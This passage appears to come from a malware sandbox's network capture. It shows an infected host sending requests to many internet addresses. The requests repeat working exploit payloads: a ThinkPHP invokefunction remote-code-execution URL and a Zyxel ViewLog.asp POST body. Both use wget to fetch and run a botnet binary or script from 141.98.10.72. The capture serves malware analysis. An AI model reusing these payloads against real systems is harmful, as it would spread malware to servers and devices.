                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.482434034 CET433INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:20 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            341192.168.2.233860488.153.80.13080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.589490891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:37.803962946 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            342192.168.2.233669888.87.90.9780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.625303984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:37.874731064 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:28:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            343192.168.2.234702688.221.57.13880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.778892994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:37.968049049 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:37 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:37 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 61 33 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 37 26 23 34 36 3b 35 37 62 31 62 38 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8a39dd58&#46;1707899317&#46;57b1b83</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            344192.168.2.234732088.208.41.9680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.792757988 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:37.996011019 CET323INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            345192.168.2.235935688.164.157.7180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.804075956 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:38.021260023 CET333INHTTP/1.0 400 Bad Request
                                                            Date: Wed, 23 Jan 1991 14:15:04 GMT
                                                            Server: Boa/0.94.14rc18-ipcam
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            346192.168.2.234615495.101.243.20080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:37.991050959 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:38.189532995 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:38 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:38 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 62 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 38 26 23 34 36 3b 33 35 36 33 37 32 63 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6b3f655f&#46;1707899318&#46;356372c3</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            347192.168.2.236082495.182.78.1180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:38.112035036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:38.351110935 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            348192.168.2.233745695.57.5.10780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:38.255168915 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:38.542924881 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:28:38.542979002 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            349192.168.2.235317031.136.171.2368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.727963924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:42.941442966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.084537983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.114917994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.199368000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.344455004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            350192.168.2.235485831.136.134.818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.744884014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:42.941395998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.084697008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.114905119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.199351072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.344445944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            351192.168.2.234621095.101.243.20080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.751534939 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:39.948340893 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 39 26 23 34 36 3b 32 35 36 64 30 37 63 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
